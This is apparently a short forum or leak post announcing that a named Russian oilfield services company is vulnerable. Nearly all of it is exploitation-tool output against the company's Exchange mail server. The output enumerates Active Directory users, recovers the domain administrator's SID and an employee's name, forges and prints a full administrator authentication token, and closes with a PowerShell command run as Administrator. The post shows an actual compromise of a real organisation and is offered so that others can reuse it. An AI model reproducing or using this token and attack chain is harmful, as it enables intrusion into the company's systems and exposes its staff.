Yet another vulnerable Russian oil company
DancingClown

About: Facilities and services. Leading oilfield services company in pipeline services and well drilling support.

Site: https://g-n-s.ru/

POC: mail.g-n-s.ru
[+] Exchange Backend Servers: ['mx.gns.local']
[+]     mx.gns.local - version: 15.2.595.8
[+]     mx.gns.local - version_short: Exchange Server 2019 CU5 Mar21SU
[+]     mx.gns.local - user: NT AUTHORITY\СИСТЕМА
[+]     mx.gns.local - sid: S-1-5-18
[+] Attempting to retrieve Active Directory emails...
[+] Enumerated 0 possible UserMailbox LegacyDNs from Active Directory
[+] Enumerated 100 possible User LegacyDNs from Active Directory
[+] Enumerated SMTP domains: {'local.', 'g-n-s.ru'}
[+] Attempting to discover SID via 14 builtin email combinations
[+]     Retrieved LegacyDN: /o=GNS/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userd44d6598
[+]     Identified backend SMTP domain: g-n-s.ru
[+]     Attempting to retrieve SID for /o=GNS/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userd44d6598
[+]     Successfully parsed SID via UserMailbox object: S-1-5-21-4050735197-1907448506-3362732542-500
[+] Attempting to discover SID via 100 enumerated emails
[+]     Retrieved LegacyDN: /o=GNS/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5ef051cd8f96445fbb625dab863c91d2-Dmiitry Akhapkin
[+]     Attempting to retrieve SID for /o=GNS/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5ef051cd8f96445fbb625dab863c91d2-Dmiitry Akhapkin
[+]     Successfully parsed SID via UserMailbox object: S-1-5-21-4050735197-1907448506-3362732542-1613
[+] RID Cycled: S-1-5-21-4050735197-1907448506-3362732542-500
[+] Generated token for [email protected] - S-1-5-21-4050735197-1907448506-3362732542-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBZBZG1pbmlzdHJhdG9yQGctbi1zLnJ1VS1TLTEtNS0yMS00MDUwNzM1MTk3LTE5MDc0NDg1MDYtMzM2MjczMjU0Mi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=
PS> Get-Mailbox
Administrator